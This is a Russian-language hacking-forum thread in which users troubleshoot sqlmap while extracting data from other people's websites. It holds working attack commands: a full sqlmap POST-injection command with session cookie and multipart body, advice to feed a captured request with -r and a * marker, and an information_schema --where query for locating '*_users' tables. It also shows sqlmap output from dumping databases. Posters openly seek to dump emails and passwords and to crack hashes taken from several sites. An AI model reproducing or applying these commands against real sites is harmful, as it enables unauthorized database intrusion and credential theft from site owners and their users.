Вопросы по SQLMap

Discussion in 'Уязвимости' started by randman, 1 Oct 2015.

  1. Estet

    Estet New Member

    Joined:
    30 Aug 2016
    Messages:
    33
    Likes Received:
    2
    Reputations:
    0
    Народ, кто встречал такое:
    Извлекаю уже на третьем сайте, подобную хрень:
    ?t?1f?????F/???|????6(?\\R?jGa??,b?`???????
    Соль такого формата
    -121880803
    либо положительное значение.

    Пробовал закинуть свой пас и извлечь хэш, получил тоже самое.
    закинул в базу пароль: 123qwe
    получил его хэш: ?;\n?p????x=A?F??)9???hR??Pr????q??

    Кто встречал подобное? Грешил на язык, но вроде и сайты англоязычные и это же хэш) они бывают на других языках? ) Сори не так давно работаю с хэш функциями, не во всем разб
     
    #961 Estet, 7 Nov 2019
    Last edited: 7 Nov 2019
  2. vladF

    vladF New Member

    Joined:
    5 Dec 2018
    Messages:
    16
    Likes Received:
    0
    Reputations:
    0
    Сканер нашел уязвимость,но я с таким столкнулся впервые
    Code:
    -u "https://site.com/user_save.php" -p "county_id" --risk="3" --method="POST" --data="--31ed9d031d5848e3a524ba24f417a44b
    Content-Disposition: form-data; name=%22forename%22
    
    Smith
    --31ed9d031d5848e3a524ba24f417a44b
    Content-Disposition: form-data; name=%22surname%22
    
    Smith
    --31ed9d031d5848e3a524ba24f417a44b
    Content-Disposition: form-data; name=%22email%22
    
    [email protected]
    --31ed9d031d5848e3a524ba24f417a44b
    Content-Disposition: form-data; name=%22new_pass%22
    
    N3tsp@rker-
    --31ed9d031d5848e3a524ba24f417a44b
    Content-Disposition: form-data; name=%22retype_pass%22
    
    N3tsp@rker-
    --31ed9d031d5848e3a524ba24f417a44b
    Content-Disposition: form-data; name=%22county_id%22
    
    test
    --31ed9d031d5848e3a524ba24f417a44b
    Content-Disposition: form-data; name=%22town_id%22
    
    893
    --31ed9d031d5848e3a524ba24f417a44b
    Content-Disposition: form-data; name=%22phone%22
    
    3
    --31ed9d031d5848e3a524ba24f417a44b
    Content-Disposition: form-data; name=%22mobile%22
    
    3
    --31ed9d031d5848e3a524ba24f417a44b
    Content-Disposition: form-data; name=%22terms_conditions%22
    
    on
    --31ed9d031d5848e3a524ba24f417a44b
    Content-Disposition: form-data; name=%22subscribe_emails%22
    
    on
    --31ed9d031d5848e3a524ba24f417a44b
    Content-Disposition: form-data; name=%22g-recaptcha-response%22
    
    10000000146
    --31ed9d031d5848e3a524ba24f417a44b
    Content-Disposition: form-data; name=%22submit%22
    
    Create Account
    --31ed9d031d5848e3a524ba24f417a44b--
    " --user-agent="Mozilla/5.0 (Windows NT 6.3; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2272.16 Safari/537.36" --cookie="PHPSESSID=vorccgbo8prl78srfaqavg0map" --headers="Host:www.site.com\nCache-Control:no-cache\nReferer:https://site.com/user_save.php\nAccept:text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5\nAccept-Language:en-us,en;q=0.5\nX-Scanner:Netsparker\nAccept-Encoding:gzip, deflate\nContent-Type:multipart/form-data; boundary=31ed9d031d5848e3a524ba24f417a44b" --dbms="MySQL"
    Пробую через sqlmap - получаю такую ошибку:
    [CRITICAL] all testable parameters you provided are not present within the given request data

    Как правильно скормить в sqlmap?
     
  3. winstrool

    winstrool ~~*MasterBlind*~~

    Joined:
    6 Mar 2007
    Messages:
    1,414
    Likes Received:
    911
    Reputations:
    863
    Правильно сложите весь пакет запроса в файл и подключите его через параметр: sqlmap.py -r file.txt
     
    _________________________
    vladF likes this.
  4. vladF

    vladF New Member

    Joined:
    5 Dec 2018
    Messages:
    16
    Likes Received:
    0
    Reputations:
    0
    Такая же ошибка вылетает.. Подскажите, как "Правильно сложить весь пакет"? Может я что-то не так делаю..
     
  5. winstrool

    winstrool ~~*MasterBlind*~~

    Joined:
    6 Mar 2007
    Messages:
    1,414
    Likes Received:
    911
    Reputations:
    863
    зайти на этот урл, и сделай то действие чтоб перехватить запрос, так полагаю это сохранение по название скрипта, перехватываешь тело запроса и кладешь в файлик, а дальше этот файлик скармливаешь скульмапу, если известен уязвимый параметр, то помечаешь его * чтоб скульмап зря не тратил время на другие параметры и сразу обратился к нему.
     
    _________________________
    Axiles and vladF like this.
  6. fandor9

    fandor9 Reservists Of Antichat

    Joined:
    16 Nov 2018
    Messages:
    630
    Likes Received:
    1,050
    Reputations:
    47
    честно говоря, сам не встречался с таким, но судя по выводу похоже что мап выдаёт вам сразу бинарные данные (байты), а ваша консоль конвертирует их сразу в ASCII. И тогда вы получаете вот такую вот хрень. Можете попробовать прогнать мап через локальный веб-прокси (Burp и прочее) и посмотреть что там вам выдаёт мап.
     
    Eidolon likes this.
  7. jakonda1001

    jakonda1001 New Member

    Joined:
    17 Mar 2016
    Messages:
    178
    Likes Received:
    3
    Reputations:
    0
    блин не пойму как сдампить только мыльники и пароли (не проверяя в какой они таблице, если есть) (просто пример любой на вскидку, дальше по аналогии пойму)
     
  8. Goore

    Goore New Member

    Joined:
    30 Mar 2010
    Messages:
    1
    Likes Received:
    0
    Reputations:
    0
    Server:

    web server operating system: Windows 10 or 2016
    web application technology: ASP.NET, Microsoft IIS 10.0, ASP
    back-end DBMS: active fingerprint: Microsoft SQL Server 2017

    Parameter: #1* ((custom) POST)
    Type: error-based
    Title: Microsoft SQL Server/Sybase AND error-based - WHERE or HAVING clause (IN)


    sqlmap udalos vitashits DB list(55 Dbs) - no kogda delaesh -D db --tables, srazu pokazivaet redirekt na orginal sait www.sait.com - i ne daet vitashits tablici, sto delats?
    databases udalos vitashits tolka s --no-cast

    "sqlmap got a 302 redirect to 'http://www.sait.com'. Do you want to follow? [Y/n]"
    kogda vitaskival DB ne prosilo takoe, i vse skachalos norm
     
  9. Goore

    Goore New Member

    Joined:
    30 Mar 2010
    Messages:
    1
    Likes Received:
    0
    Reputations:
    0
    [12:46:13] [INFO] fetching tables for database: ev
    [12:46:13] [INFO] heuristics detected web page charset 'ascii'
    [12:46:13] [WARNING] the SQL query provided does not return any output
    [12:46:13] [WARNING] it was not possible to count the number of entries for the SQL query provided. sqlmap will assume that it returns only one entry
    [12:46:14] [WARNING] the SQL query provided does not return any output
    [12:46:14] [CRITICAL] unable to retrieve the tables for any database
    [12:46:14] [WARNING] HTTP error codes detected during run:
    500 (Internal Server Error) - 1 times
     
  10. RWD

    RWD Member

    Joined:
    25 Apr 2013
    Messages:
    157
    Likes Received:
    41
    Reputations:
    2
    да
     
  11. WallHack

    WallHack Elder - Старейшина

    Joined:
    18 Jul 2013
    Messages:
    306
    Likes Received:
    138
    Reputations:
    33
    Sqlmap перестал работать, не видит ключи
    sqlmap.py -hh
    sqlmap.py --update

    В любом случае
    Code:
    Usage: sqlmap.py [options]
    
    sqlmap.py: error: missing a mandatory option (-d, -u, -l, -m, -r, -g, -c, -x, --
    list-tampers, --wizard, --update, --purge or --dependencies). Use -h for basic a
    nd -hh for advanced help
    
    
    Press Enter to continue...
    Что отвалилось ?
     
  12. Vinc

    Vinc Member

    Joined:
    7 Nov 2010
    Messages:
    94
    Likes Received:
    24
    Reputations:
    0
    проще заново скачать в другую папку и запустить
     
  13. RWD

    RWD Member

    Joined:
    25 Apr 2013
    Messages:
    157
    Likes Received:
    41
    Reputations:
    2
    бывает ломается python, как вариант переустановить оба.
     
  14. dmjROV

    dmjROV New Member

    Joined:
    8 Nov 2008
    Messages:
    1
    Likes Received:
    2
    Reputations:
    0
    Всем привет.
    Как составить запрос в sqlmap, что бы он брал колонки с таблиц в которых содержится "*_users", то есть префиксы бывают разные (blabla1_users, blabla2_users и тд), чувствую что надо как то играться с параметром -T --where, буду очень благодарен за помощь.
     
  15. sosidzh24

    sosidzh24 Member

    Joined:
    10 Apr 2019
    Messages:
    176
    Likes Received:
    7
    Reputations:
    0
    Если я правильно понял, то --search -C "users". Далее выбрать первый вариант или все поставить на --batch .Тогда он сдампит все колонки где названии рисутствует "users"
     
  16. karkajoi

    karkajoi Well-Known Member

    Joined:
    26 Oct 2016
    Messages:
    488
    Likes Received:
    459
    Reputations:
    8
    --dump еще по идее надо
     
  17. sosidzh24

    sosidzh24 Member

    Joined:
    10 Apr 2019
    Messages:
    176
    Likes Received:
    7
    Reputations:
    0
    на --batch он сам сдампит
     
  18. panic.ker

    panic.ker Member

    Joined:
    25 Aug 2013
    Messages:
    86
    Likes Received:
    69
    Reputations:
    3
    -D information_schema -T columns -C table_name,column_name --where="table_name LIKE '%_users'" --dump
    нееее, не так? =) dmjROV тестани, если тебе именно колумны с таблов где *_узерс повыводить ннада.
    Или я не понял с недосыпа, поздновато уже.
     
    #978 panic.ker, 26 Nov 2019
    Last edited: 26 Nov 2019
  19. norther

    norther New Member

    Joined:
    23 Mar 2013
    Messages:
    1
    Likes Received:
    0
    Reputations:
    0
    Приветствую!

    Ковыряю одну скулю:
    SqlMap последней версии
    web application technology: Apache, Nginx
    back-end DBMS operating system: Linux Debian
    back-end DBMS: PostgreSQL

    Type: boolean-based blind
    Title: AND boolean-based blind - WHERE or HAVING clause

    ПРОБЛЕМА: При получении ответа на любой запрос постоянно на случайных позициях неправильно определяет символы! Например, получаю имя колонки "user_id", так SqlMap может один раз выдать "use?_id", в другой раз если повторить запрос выдаст ""uQer_id" или "uMe#_id" и т.д. Иногда вообще неотображаемые символы получаются и SqlMap на то ругается:
    "cannot properly display (some) Unicode characters inside your terminal ('cp866') environment. All unhandled occurrences will result in replacement with '?' character. Please, find proper character representation inside corresponding output files"
    " [WARNING] in case of continuous data retrieval problems you are advised to try a switch '--no-cast' or switch '--hex'"

    --no-cast и --hex пробовал - не помогает.
    Ответы сервера понятные и предсказуемые. Если подставляемое выражение = FALSE то возвращается пустая страница при TRUE возвращается с контентом

    Что это может быть? Какие возможные решения данной проблемы?
     
  20. Groove

    Groove Member

    Joined:
    13 Nov 2010
    Messages:
    183
    Likes Received:
    22
    Reputations:
    2
    Где в sqlmap настройки цветовой палитры?? Хочу изменить цвет текста